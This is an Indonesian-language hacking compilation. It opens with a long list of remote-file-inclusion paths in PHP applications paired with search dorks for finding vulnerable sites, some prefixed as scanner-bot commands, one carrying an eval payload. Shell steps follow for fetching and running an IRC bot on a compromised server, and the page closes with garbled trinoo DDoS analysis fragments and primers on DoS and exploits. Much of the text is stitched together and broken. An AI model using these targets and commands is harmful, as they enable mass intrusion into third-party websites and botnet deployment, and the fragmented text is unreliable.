docs/front-end-demo/cart2.php?workdir= “inurl%3A%22aLogIn.php%22″
docs/front-end-demo/cart2.php?workdir= inurl:hosting.php?spt=
/bemarket/postscript/postscript.php?p_mode= /bemarket/
index.php?mode= inurl:”*.php?mode=join” friend
/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root= inurl:/modules/icontent
modules/coppermine/themes/default/theme.php?THEME_DIR= Powered By Coppermine Photo Gallery v1.2.2b
/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root= inurl:”phpwcms/index.php?id=”
!scan modify.php?dir_module= allinurl%3Axfsection+site%3Ajp
/modules/userstop/userstop.php?exbb[home_path]= Powered by ExBB
index.php?page= allinurl%3Aindex.php%3Fpagedb%3D
contenido/external/frontend/news.php?cfg[path][includes]= cms/front_content.php?idcat=
/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path= “Mambo” site:gov
includes/include_once.php?include_file= allinurl%3A%2Fproduct_info.php%3Fcust_id%3D”
mygallerybrowser.php?myPath= inurl:%22/mygallery/myfunctions/%22
admin/classes/pear/Spreadsheet/Excel/Writer/Worksheet.php?homedir= “LimeSurvey”
admin/classes/pear/Spreadsheet/Excel/Writer.php?homedir= “LimeSurvey”
admin/classes/pear/OLE/PPS/Root.php?homedir= “LimeSurvey”
admin/classes/pear/OLE/PPS/File.php?homedir= “LimeSurvey”
phpbb/sendmsg.php?phpbb_root_path= “Flashbb”
PPPoE/admin_modules/admin_module_deldir.inc.php?config[path_src_include]= “Powered by yappa-ng 2.3.1″
library/authorize.php?login_form= “PhpHostBot”
historytemplate.php?cms[support]=1&cms[tngpath]= “powered by The Next Generation of Genealogy Sitebuilding”
index.php?page= inurl:index.php%”Submit%Articles”%”Member%Login”%”Top%Authors”
!scan modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]= “Nuke ET Copyright � 2004 por Truzone.”
modules/admin/vw_usr_roles.php?baseDir= “dotProject logo”
modules/Forums/admin/admin_users.php?phpbb_root_path= %22modules.php%3Fname%3DForums%22
@scan 1000 includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]= “Powered+by+CubeCart+3.0.0″
eva/imprim.php3?aide= “Eva-Web”
index.php?s= index.php?s=
!scan index.php?a= index.php?a=
/xcart/config.php?xcart_dir= “X-CART. Powerful PHP shopping cart software”
classes/phpmailer/class.cs_phpmailer.php?classes_dir= index.php?target=cart
classes/phpmailer/class.cs_phpmailer.php?classes_dir= index.php?target=pages
/ws/get_events.php?includedir= WebCalendar
agenda2.php3?rootagenda= phpmyagenda
modules/vwar/convert/mvcw_conver.php?step=1&vwar_root= inurl:”vwar”
/templates/tmpl_dfl/scripts/index.php?dir[inc]= “Powered by : Dolphin Web Community Software”
admin/business_inc/saveserver.php?thisdir= Confixx Professional
protection.php?action=logout&siteurl= PHPFanBase
modify.php?dir_module= allinurl%3Axfsection
classes/phpmailer/class.cs_phpmailer.php?classes_dir= inurl:cs-cart
!scan wp-pass.php?_wp_http_referer= “powered by wordpress”
.scan index.php?abs_path= index.php?action=viewcart
/modules/4nAlbum/public/displayCategory.php?basepath= allinurl:modules.php?name=4nAlbum
index.php?func= “Powered by FlashGameScript”
sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]= inurl:”sohoadmin”
sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D= inurl:”index.php?pr=Services”
/include.php?path=psp/user.php&site=psp/include.php?path=psp/user.php&site= “Punktesystem Pro”
ws/login.php?noSet=0&includedir= “WebCalendar”
!scan login.php?svr_rootscript= allinurl:order?page=plan_show
modules/MDForum/includes/functions_admin.php?phpbb_root_path= “powered by MDForum”
/newsboard//admin/addons/archive/archive.php?adminfolder= “/newsboard/”
/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root= “/vwar/”
anguage/lang_german/lang_main_album.php?phpbb_root_path= phpbbplus
index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= “.uk/index.php”+”option”
index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= “Powered by Mambo” site:br
index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= “Powered by Mambo” site:il
index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= com_frontpage site:my
eva/index.php3?aide= “Eva-Web”
/vwar/convert/mvcw.php?step=1&vwar_root= vwar
/bin/TreeMenuXL.php?_SERVER[DOCUMENT_ROOT]= “HTML_TreeMenuXL
/bin/TreeMenuXL.php?_SERVER[DOCUMENT_ROOT]= “HTML_TreeMenu”
/photo_comment.php?toroot= �Exhibit Engine 1.5 RC 4″
protection.php?action=logout&siteurl= allinurl%3Amembers.php%3Fid%3Dall+site%3Anet
/accounts/inc/include.php?language=0&lang_settings[0][1]= “powered by Icewarp”
plugins/safehtml/HTMLSax3.php?dir[plugins]= “powered by boonex”
plugins/safehtml/HTMLSax3.php?dir[plugins]= “netcat require”
/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=include($_GET[a]);&a= “powered by CMS Made Simple version”
includes/include_once.php?include_file= create_account.php?PHPSESSID=
index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]= “Powered By Zen Cart”
index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]= Copyright � 2003-2006 Zen Cart
/inc/header.php/step_one.php?server_inc= step_one.php?sid
components/com_joomlalib/standalone/stubjambo.php?baseDir= com_joomap
components/com_joomlalib/standalone/stubjambo.php?baseDir= com_jpgraph
components/com_joomlalib/standalone/stubjambo.php?baseDir= com_letterman
components/com_joomlalib/standalone/stubjambo.php?baseDir= com_swmenufree
components/com_joomlalib/standalone/stubjambo.php?baseDir= com_bsq_sitestats
components/com_livechat/livechat.html.php?mosConfig_absolute_path= com_livechat
components/com_mypms/class.mypms.php?mosConfig_absolute_path= com_mypms
/admin/classes/TplLoad.php?full_path_to_public_program= /TplLoad.php/
/kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act= /kboard.php?board=
/index.php?abg_path= Africa Be Gone
errors.php?error= “BoonEx- Community Software; Dating And Social Networking Scripts; Video Chat And More.”
/?sIncPath= “BoonEx- Community Software; Dating And Social Networking Scripts; Video Chat And More.”
/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=include($_GET[a]);&a= /index.php?mact=
/LightTwoOh/sidebar.php?loadpage= phpAutoVide

/com_joomnik/admin.joomnik.html.php?mosConfig_absolute_path= com_joomnik
/com_joomlaflashfun/admin.joomlaflashfun.php?= com_joomlaflashfun
/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path= com_admin
/administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path= com_x-shop
/administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path= com_lurm_constructor
!scan tools/send_reminders.php?noSet=0&includedir= WebCalendar v1.0.4
!scan modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR= xoopsgallery
!scan /config.inc.php?path_escape= XZero Community Classified
!scan /php121adminconfig.php?mosConfig_absolute_path= PHP121
!scan /common/db.php?commonpath= “samPHPweb”
administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= com_rss

path/bridge/yabbse.inc.php?sourcedir= Coppermine Photo Gallery
!scan /lib/functions.php?DOC_ROOT= intitle:”OFFL – Login”
!scan administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site= “/index.php?option=com_joomlaradiov5″

calogic/clmcpreload.php?CLPATH= calogic
modules/Forums/admin/admin_db_utilities.php?phpbb_root_path= modules.php?name=
modifyform.html?code= modifyform.html?*=*
components/com_joomlalib/standalone/stubjambo.php?baseDir= com_frontpage
# com_jce # NEW BUG SECURITY PHP 9/15/07 10:05 pm
# com_jim # NEW BUG SECURITY PHP 9/15/07 9:12 pm
# com_jreactions # NEW BUG SECURITY PHP 9/15/07 8:56 pm
# com_neoreferences # NEW BUG SECURITY PHP 9/15/07 8:
# com_quran # NEW BUG SECURITY PHP 9/15/07 7:49 pm
# com_datsogallery # NEW BUG SECURITY PHP 9/15/07 7:47 pm
# com_ricettario # NEW BUG SECURITY PHP 9/15/07 7:38 pm
# com_ab_calendar # NEW BUG SECURITY PHP 9/15/07 7:14 p
# com_joomlalib # NEW BUG SECURITY PHP 9/15/07 6:27 pm

/language/lang_german/lang_main_album.php?phpbb_root_path=
“Powered by phpBB2 Plus”
!scan administrator/components/com_jreactions/langset.php?comPath= Joomla J! Reactions
!scan language/lang_english/lang_main_album.php?phpbb_root_path= phpbb inurl:album.php site:uk
!scan /rconfig.inc.php?config[root_dir]= amember Pro / amember
Solo @rfi /language/lang_english/lang_main_album.php?phpbb_root_path= “Powered by phpBB2 Plus”
administrator/components/com_ricettario/admin.ricettario.php?mosConfig_absolute_path= com_joomlaboard
administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path= com_joomlaboard
administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path= com_frontpage
components/com_datsogallery/datsogallery.php?mosConfig_absolute_path= com_frontpage
administrator/components/com_ricettario/admin.ricettario.php?mosConfig_absolute_path= com_frontpage
mcconfig.php?CLPATH= calogic Philip Boone
components/com_hotproperty/components/com_hotproperty/hotproperty.php?mosConfig_absolute_path= com_sobi2
components/com_hotproperty/components/com_hotproperty/hotproperty.php?mosConfig_absolute_path= com_acajoom
administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir= “.tr./components” “.tr./components”
components/com_contxtd/contxtd.class.php?mosConfig_absolute_path= com_contxtd
administrator/components/com_joomla-visites/admin.joomla-visites.php?mosConfig_absolute_path= components/com_blastchatc/blastchatc.php?mosConfig_absolute_path=
/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=
/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=
/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=
/components/com_chronocontact/excelwriter/PEAR.php?mosConfig_absolute_path=
administrator/components/com_uddeim/admin.uddeim.php?mosConfig_absolute_path= com_uddeim

components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path= com_rwcards
administrator/components/com_rwcards/admin.rwcards.about.html.php?mosConfig_absolute_path= com_rwcards
mail/content/fnc-readmail3.php?__SOCKETMAIL_ROOT= “Powered by SocketMail”
modules/Forums/favorites.php?nuke_bb_root_path= Powered by Platinum 7.6.b.5
!scan administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path= com_chronocontact
includes/include_once.php?include_file= Click to View Our Catalog
rconfig.inc.php?config[root_dir]= aMember PRO
index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path= com_performs
/components/com_joomlalib/standalone/stubjambo.php?baseDir= com_performs
!scan /_theme/breadcrumb.php?rootBase= “!new Female Celebrities”
urlinn_includes/config.php?dir_ws= put a copy/past from URL
/_inc/config.php?rootBase= “! Hide Your Friends & Comments”
!scan includes/functions_admin.php?phpbb_root_path= pNphpBB2
tiny_includes/config.php?dir_ws= put a copy/past from URL
/_theme/_siteColors.php?rootBase= ‘page generated in’ time?
!alls index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path= com_performs
!alls index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path= com_joomlaxplorer
com_neolegal | com_dfcontact | com_massmail | com_syndicate |com_categories |com_newsfeeds | com_banners |
index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path= 2004 Miro International Pty Ltd.
administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path= com_chronocontact
=============================
administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=
administrator/components/com_pinboard/install.pinboard.php?mosConfig_absolute_path=
components/com_visualrecommend/visualrecommend.php?mosConfig_absolute_path=
administrator/components/com_visualrecommend/admin.visualrecommend.php?mosConfig_absolute_path=
components/com_visualrecommend/visualrecommend.html.php?mosConfig_absolute_path=
components/com_utchat/utchat.php?mosConfig_absolute_path=
components/com_google_maps/google_maps.php?mosConfig_absolute_path=
/administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=
/administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=
/administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=
/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=
/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=
/administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=
administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path= com_peoplebook
/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]= webshop
/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]= CubeCart
/tools/send_reminders.php?includedir= day.php?date=
administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir= com_cropimage
config/config_admin.php?INC= “Your Search Starts Here”
config_member.php?INC= “Your Search Starts Here”
config/config_member.php?INC= “Your Search Starts Here”

Sebelumnya anda pastikan dulu ingin di load dimana botnya, disini ada 2 server yg bisa digunakan. Irc.Allnetwork.Org & Irc.Byroe.Net. Setelah itu siapkan Shell dan langsung saja masukan semua comand ini ke dalam shell, tunggu botnya masuk kedalam chan km. Selamat Mencoba

### Irc.Allnetwork.Org ###

1. cd /var/tmp
2. wget geocities.com/jiwangdotus/eggmbonx.tar.gz
3. tar -zxvf eggmbonx.tar.gz
4. cd mbonx
5. wget geocities.com/jongke_city/chanary.txt
6. mv chanary.txt chanary.conf
7. ./nadya conf (nick-bot) (ident-bot) (ip-shell) (channel) (owner)
contoh tuk no.7 : ./nadya conf Estrada-Bot Bot 202.135.14.21 solo_underground Estrada

8. cd scripts
9. wget geocities.com/jongke_city/ sOlTecH.txt
10. mv sOlTecH.txt ary.tcl
11. ./autobotchk conf
12. cd ..
13. ./run conf [httpd]

### Irc.Byroe.Net ###

1. cd /var/tmp
2. wget geocities.com/jiwangdotus/eggmbonx.tar.gz
3. tar -zxvf eggmbonx.tar.gz
4. cd mbonx
5. wget geocities.com/script_help/chanary.txt
6. mv chanary.txt chanary.conf
7. ./nadya conf (nick-bot) (ident-bot) (ip-shell) (channel) (owner)
contoh tuk no.7 : ./nadya conf Estrada-Bot Bot 202.135.14.21 solo_underground Estrada

8. cd scripts
9. wget geocities.com/script_help/ sOlTecH.txt
10. mv sOlTecH.txt ary.tcl
11. ./autobotchk conf
12. cd ..
13. ./run conf [httpd]

Thx For ROZI my Owner

Pertama – tama siapkan shell yang dari linux maupun freeBSD, perbedaanya cuma pemakaian commands`nya. Tentunya banyak yang sudah tau, ya khan?

Selanjutnya kita buka shell & buat directoy dahulu untuk menaruh file ircdnya, dan sebelumnya cek dulu dimana posisi directory kita:

pwd

/home/estrada

mkdir solo

nb: solo <= contoh nama directory baru, tempat kita menyimpan file.

Setelah itu kita tinggal masuk ke directory baru kita dan mengexsesekusinya:

1. cd /solo

2. wget http://bdd.exolia.net/serveurs/Unreal3.2.7.tar.gz
3. tar -zxvf Unreal3.2.7.tar.gz
4. cd Unreal3.2.7
5. ./Config

Kalau ada konfirmasi meminta -[ Enter]- Anda tekan Enter aja terus sampai menunjukan 100%.

6. make

Setelah di make anda edit dulu configurasi dari unrealircd.conf, connect.conf, oper.conf, ircd.mtod nya. Untuk Linux gunakan “vi” Sedangkan untuk FreeBSD bisa digunakan “pico” untuk mengedit configurasinya, tergantung support tidaknya. untuk menyimpan file yang telah di edit gunakan comand “Esc + :wq + enter”.

vi unrealircd.conf
vi connect.conf
vi oper.conf
vi ircd.motd

Setelah semua selesai di edit configurasinya exsekusi dengan :
7. make install
8. ./unreal start

Nah selesai sudah, sekarang anda memiliki server sendiri.

Cukup sekian dulu penjelasanya, kalau ada yg perlu ditanyakan saran dan kritik akan kami terima dengan lapang dada.

NB: Untuk contoh unrealircd.conf, connect.conf, oper.conf anda bisa lihat di kategori IRCD.

Thanks Regard To :

Dj-RuFfy – NOGGLENK – ROZI And Sekip Crew – Cavalera And Habbat Crew.

Irc.Mildnet.Org Crew

Irc.Allindo.Net Crew

Irc.Indoirc.Net Crew

Irc.Byroe.Net Crew

1. ./master

1. . . .
2. ./master

1. Likewise, when you connect to the remote command port (default

1. strings --bytes=3 ns | tail -15

• HELLO*

• * * * * /usr/sbin/rpc.listen

1. define CRYPTKEY "ZsoTN.cq4X31"

1. ls -l ... ...-b

1. cat ...

1. cat ...-b

1. netstat -a --inet

1. lsof | egrep ":31335|:27665"

1. lsof -p 1292

1. netstat -a --inet

1. lsof | egrep ":27444"

1. lsof -p 1316

1. tcpdump ip host 192.168.0.1

1. strings - ns

• HELLO*

1. strings - master

• HELLO*

1. ngrep -i -x "*hello*|pong" udp

1. U 192.168.0.1:32887 -> 10.0.0.1:31335

1. ##

• /

• jolt by Jeff W. Roberson (modified by Mixter for overdrop effect)
• land by m3lt
• nestea by humble & ttol
• newtear by route|daemon9
• syndrop by PineKoan
• teardrop by route|daemon9
• winnuke by _eci */

1. ngrep -x ".*" tcp port 27665 or udp port 31335 or udp port 27444

1. U 192.168.0.1:32892 -> 10.0.0.1:31335

1. T 192.168.100.1:1074 -> 10.0.0.1:27665 [AP]

1. #####

1. T 10.0.0.1:27665 -> 192.168.100.1:1074 [AP]

1. #

1. ##

1. T 10.0.0.1:27665 -> 192.168.100.1:1074 [AP]

1. ##

1. #

1. #

1. U 10.0.0.1:1025 -> 192.168.0.1:27444

1. #

1. ##

1. ##

1. U 10.0.0.1:1025 -> 192.168.0.1:27444

1. T 10.0.0.1:27665 -> 192.168.100.1:1074 [AP]

1. ##

1. T 10.0.0.1:27665 -> 192.168.100.1:1074 [AP]

1. U 10.0.0.1:1025 -> 192.168.0.1:27444

1. T 10.0.0.1:27665 -> 192.168.100.1:1074 [AP]

1. #

1. T 10.0.0.1:27665 -> 192.168.100.1:1074 [AP]

1. ##

1. #

1. ##

1. ##

1. #

1. U 10.0.0.1:1025 -> 192.168.0.1:27444

1. #

1. #

1. #

1. T 10.0.0.1:27665 -> 192.168.100.1:1075 [AP]

1. !/usr/bin/perl -w
2. # trinot v. 1.1
3. By Dave Dittrich <dittrich@cac.washington.edu>
4. # Send commands to trinoo daemon(s), causing them to PONG, *HELLO*
5. to all their masters, exit, etc. Using this program (and knowledge
6. of the proper daemon password), you can affect trinoo daemons
7. externally and monitor packets to verify if the daemons are up,
8. expose their masters, or shut them down.
9. # Needs Net::RawIP (http://quake.skif.net/RawIP)
10. Requires libpcap (ftp://ftp.ee.lbl.gov/libpcap.tar.Z)
11. # Example: ./trinot host1 [host2 [...]]
12. ./trinot -S host
13. ./trinot -p password -P host
14. # (This code was hacked from the "macof" program, written by
15. Ian Vitek <ian.vitek@infosec.se>)

1. set default values

1. choose network card

• ** To report a security incident in progress, call (612) 625-0006 ***

Serangan DoS sederhana yang menggunakan host penyerang yang lebih kuat dibandingkan dengan host target.

serangan terhadap sebuah komputer atau server di dalam jaringan internet dengan cara menghabiskan sumber (resource) yang dimiliki oleh komputer tersebut sampai komputer tersebut tidak dapat menjalankan fungsinya dengan benar sehingga secara tidak langsung mencegah pengguna lain untuk memperoleh akses layanan dari komputer yang diserang tersebut.

Dalam sebuah serangan Denial of Service, si penyerang akan mencoba untuk mencegah akses seorang pengguna terhadap sistem atau jaringan dengan menggunakan beberapa cara, yakni sebagai berikut:

• Membanjiri lalu lintas jaringan dengan banyak data sehingga lalu lintas jaringan yang datang dari pengguna yang terdaftar menjadi tidak dapat masuk ke dalam sistem jaringan. Teknik ini disebut sebagai traffic flooding.
• Membanjiri jaringan dengan banyak request terhadap sebuah layanan jaringan yang disedakan oleh sebuah host sehingga request yang datang dari pengguna terdaftar tidak dapat dilayani oleh layanan tersebut. Teknik ini disebut sebagai request flooding.
• Mengganggu komunikasi antara sebuah host dan kliennya yang terdaftar dengan menggunakan banyak cara, termasuk dengan mengubah informasi konfigurasi sistem atau bahkan perusakan fisik terhadap komponen dan server.

Bentuk serangan Denial of Service awal adalah serangan SYN Flooding Attack, yang pertama kali muncul pada tahun 1996 dan mengeksploitasi terhadap kelemahan yang terdapat di dalam protokol Transmission Control Protocol (TCP). Serangan-serangan lainnya akhirnya dikembangkan untuk mengeksploitasi kelemahan yang terdapat di dalam sistem operasi, layanan jaringan atau aplikasi untuk menjadikan sistem, layanan jaringan, atau aplikasi tersebut tidak dapat melayani pengguna, atau bahkan mengalami crash. Beberapa tool yang digunakan untuk melakukan serangan DoS pun banyak dikembangkan setelah itu (bahkan beberapa tool dapat diperoleh secara bebas), termasuk di antaranya Bonk, LAND, Smurf, Snork, WinNuke, dan Teardrop.

Meskipun demikian, serangan terhadap TCP merupakan serangan DoS yang sering dilakukan. Hal ini disebabkan karena jenis serangan lainnya (seperti halnya memenuhi ruangan hard disk dalam sistem, mengunci salah seorang akun pengguna yang valid, atau memodifikasi tabel routing dalam sebuah router) membutuhkan penetrasi jaringan terlebih dahulu, yang kemungkinan penetrasinya kecil, apalagi jika sistem jaringan tersebut telah diperkuat.

Distributed Denial of Service

Distributed Denial of Service (DDoS) atau Penolakan Layanan

Percobaan serangan Denial of Service yang dilakukan terhadap sebuah host dengan sistem operasi Windows Server 2003 Service Pack 2 (Beta).

secara Terdistribusi adalah salah satu jenis serangan Denial of Service yang menggunakan banyak host penyerang (baik itu menggunakan komputer yang didedikasikan untuk melakukan penyerangan atau komputer yang “dipaksa” menjadi zombie) untuk menyerang satu buah host target di jaringan.

Serangan Denial of Service klasik bersifat “satu lawan satu”, sehingga dibutuhkan sebuah host yang kuat (baik itu dari kekuatan pemrosesan atau sistem operasinya) demi membanjiri lalu lintas host target sehingga mencegah klien yang valid untuk mengakses layanan jaringan pada server yang dijadikan target serangan. Serangan DDoS ini menggunakan teknik yang lebih canggih dibandingkan dengan serangan Denial of Service yang asli, yakni dengan meningkatkan serangan beberapa kali dengan menggunakan beberapa komputer sekaligus, sehingga dapat mengakibatkan server atau keseluruhan segmen jaringan dapat menjadi “tidak berguna” bagi klien.

Cara kerja serangan Distributed Denial of Service sederhana

Serangan DDoS pertama kali muncul pada tahun 1999, tiga tahun setelah serangan Denial of Service yang asli dengan menggunakan serangan SYN Flooding, yang mengakibatkan beberapa server web di Internet mengalami “downtime”. Pada awal Februari 2000, sebuah serangan yang besar dilakukan sehingga beberapa situs web terkenal seperti Amazon, CNN, eBay, dan Yahoo! mengalami “downtime” selama beberapa jam. Serangan yang lebih baru lagi pernah dilancarkan pada bulan Oktober 2002 ketika 9 dari 13 root DNS Server diserang dengan menggunakan DDoS yang sangat besar yang disebut dengan “Ping Flood“. Pada puncak serangan, beberapa server-server tersebut pada tiap detiknya mendapatkan lebih dari 150000 request paket Internet Control Message Protocol (ICMP). Untungnya, karena serangan hanya dilakukan selama setengah jam saja, lalu lintas Internet pun tidak terlalu terpengaruh dengan serangan tersebut (setidaknya tidak semuanya mengalami kerusakan).

Tidak seperti akibatnya yang menjadikan kerumitan yang sangat tinggi (bagi para administrator jaringan dan server), teori dan praktek untuk melakukan serangan DDoS justru sederhana, yakni sebagai berikut:

1.Menjalankan tool yang secara otomatis akan memindai jaringan untuk menemukan host-host yang rentan (vulnerable) yang terkoneksi ke Internet. Setelah host yang rentan ditemukan, tool tersebut dapat menginstalasikan salah satu jenis dari Trojan Horse yang disebut sebagai DDoS Trojan, yang akan mengakibatkan host tersebut menjadi zombie yang dapat dikontrol secara jarak jauh oleh sebuah komputer master yang digunakan oleh si penyerang asli untuk melancarkan serangan. Beberapa tool yang digunakan untuk melakukan serangan serperti ini adalah TFN, TFN2K, Trinoo, dan Stacheldraht, yang dapat diperoleh secara bebas di Internet.

2.Ketika si penyerang merasa telah mendapatkan jumlah host yang cukup (sebagai zombie) untuk melakukan penyerangan, penyerang akan menggunakan komputer master untuk memberikan sinyal penyerangan terhadap jaringan target atau host target. Serangan ini umumnya dilakukan dengan menggunakan beberapa bentuk SYN Flood atau skema serangan DoS yang sederhana, tapi karena dilakukan oleh banyak host zombie, maka jumlah lalu lintas jaringan yang diciptakan oleh mereka adalah sangat besar, sehingga “memakan habis” semua sumber daya Transmission Control Protocol yang terdapat di dalam komputer atau jaringan target dan dapat mengakibatkan host atau jaringan tersebut mengalami “downtime”.

Hampir semua platform komputer dapat dibajak sebagai sebuah zombie untuk melakukan serangan seperti ini. Sistem-sistem populer, semacam Solaris, Linux, Microsoft Windows dan beberapa varian UNIX dapat menjadi zombie, jika memang sistem tersebut atau aplikasi yang berjalan di atasnya memiliki kelemahan yang dieksploitasi oleh penyerang.

Beberapa contoh Serangan DoS lainnya adalah adalah:

• Serangan Buffer Overflow, mengirimkan data yang melebihi kapasitas sistim, misalnya paket ICMP yang berukuran sangat besar.
• Serangan SYN, mengirimkan data TCP SYN dengan alamat palsu.
• Serangan Teardrop, mengirimkan paket IP dengan nilai offsetyang membingungkan.
• Serangan Smurf, mengirimkan paket ICMP bervolume besar dengan alamat host lain.
• ICMP Flooding

1. Eksploit

Sekarang tentunya kamu sudah asyik bermain-main dan bereksperimen dengan

shell UNIX baru yang baru kamu ‘dapatkan’. Dan mungkin sekarang kamu sudah

mulai bertanya-tanya, “apa sih eksploit (exploit, ‘sploits) itu?”. Dalam

konteks per-hacking-an, eksploit tidaklah jauh berbeda dengan artinya

dalam konteks harfiah, yaitu ‘pemanfaatan’. Tentunya eksploit-eksploit

‘hacking’ lebih spesifik lagi, yang kurang lebih bisa diartikan sebagai

‘pemanfaatan kelemahan dari sebuah sistem untuk tujuan-tujuan yang diluar

dari penggunaan normal.’ Kelemahan-kelemahan ini bisa berupa kesalahan

pemrograman, sesuatu yang tidak direncanakan oleh pemrogram asli, dan

lain-lain. Umumnya, yang jelas paling menarik perhatian kita, adalah

eksploit yang akan memberikan kita akses tidak terbatas ke seluruh aspek

dari sebuah sistem. Dalam UNIX, sering kita dengar istilah ‘mengeksploit

program anu untuk mendapat privilese root’. Tentu saja mendapatkan ‘root’

bukanlah satu-satunya tujuan pengeksploitan sistem. Seperti yang mungkin

anda sudah alami sendiri, kadang sebuah cacat dalam program seperti maild

atau ftpd bisa dimanfaatkan untuk tujuan ‘header forging’, ‘ip spoofing’,

‘denial of service attack’, dan ‘mail bombing’ (hello, Anton Pardede!).

Eksploit secara besar sering dibagi menjadi dua, yaitu eksploit lokal dan

eksploit remote. Eksploit lokal adalah jenis eksploit yang hanya bisa

dijalankan jika kamu sudah punya akses ke dalam suatu sistem (baik itu

melalui login telnet, ftp, dll). Eksploit jenis ini jumlahnya banyak,

sebab kamu sudah punya akses ke ribuan program yang berpotensi untuk

di-eksploit. Contoh – contoh dari eksploit jenis ini adalah buffer

overflow (i.e. mh di RedHat 5, SuperProbe, dll), race conditions (dimana

dua proses saling berlomba untuk menyelesaikan tugas masing-masing,

biasanya proses A disuruh untuk menjalankan suatu utilitas yang

membutuhkan privilese root temporer sementara proses B dirancang untuk

mencegat proses A sebelum proses A kembali statusnya ke privilese user

biasa, mengakibatkan di-spawn-nya shell beridentitas root – sering terjadi

di mesin-mesin IRIX dan SunOS.) Bagaimana caranya agar saya bisa

mendapatkan eksploit seperti ini? Tentu saja kamu bisa menghabiskan waktu

berjam-jam untuk mengutak-utik sebuah program sampai berhasil kamu jebol

(lebih baik dilakukan di kotak kamu sendiri), seperti para ‘elite’

lainnya. Biasanya eksploit diprogram dengan C, perl, atau sh. Namun kalau

ilmu kungfu kamu masih kayak kami (dan emang bawaannya malas), banyak

eksploit yang sudah didokumentasi dan tersedia melalui websearch, atau di

situs-situs tertentu, seperti:

http://www.rootshell.com

http://www.antionline.com

http://www.rhino9.com

http://www.dhp.com/~fyodor

atau di situs kecoak, http://k-elektronik.org/arsip/eksploit

Eksploit jenis satunya lagi adalah eksploit remote, dimana kamu bisa

mengeksploit sistem tanpa mengetahui otorisasi user/password. Tentu saja

eksploit-eksploit jenis ini jauh lebih sedikit jumlahnya, dan terkadang

dampaknya juga tidak separah eksploit lokal. Lubang cgi phf adalah salah

satu contoh dari pemanfaatan eksploit remote untuk mendapatkan file

/etc/passwd (dulu LithErr pernah memberi resep cepat memanfaatkan phf).

Mungkin belum terlihat fatal, namun sekalinya sang ‘cracker’ berhasil

masuk ke dalam sistem memanfaatkan login dan password dari salah seorang

user, maka dia bisa menjalankan eksploit-eksploit lokal untuk mendapatkan

akses tak terbatas milik root. Eksploit port 143 (IMAPd) malahan lebih

gila lagi, dengan memberikan akses root tanpa password. Apa trik dan tip

yang kira-kira berguna untuk memanfaatkan eksploit-eksploit remote? Jelas

sebuah portscanner sangatlah bermanfaat untuk melihat port-port mana saja

yang menerima koneksi. Beberapa jenis ‘scanner’ lebih terfokus lagi,

seperti cgi scanner dari kecoak (roachscan) yang saat dijalankan akan

memeriksa direktori cgi-bin dari sejumlah server sekaligus, mencari file

password atau jalan masuk lainnya, melalui beberapa jenis eksploit umum.

Satu program lain yang mungkin ada gunanya adalah ‘netcat’, bisa didapat

dari http://www.l0pht.com. Untuk menghemat waktu, banyak cracker yang

menulis skrip otomasi, jalankan skrip, tinggal berikan daftar

target-target dan tinggalkan untuk sementara waktu. Kembali lagi sejam

atau dua jam kemudian, tinggal diperiksa server-server mana saja yang ada

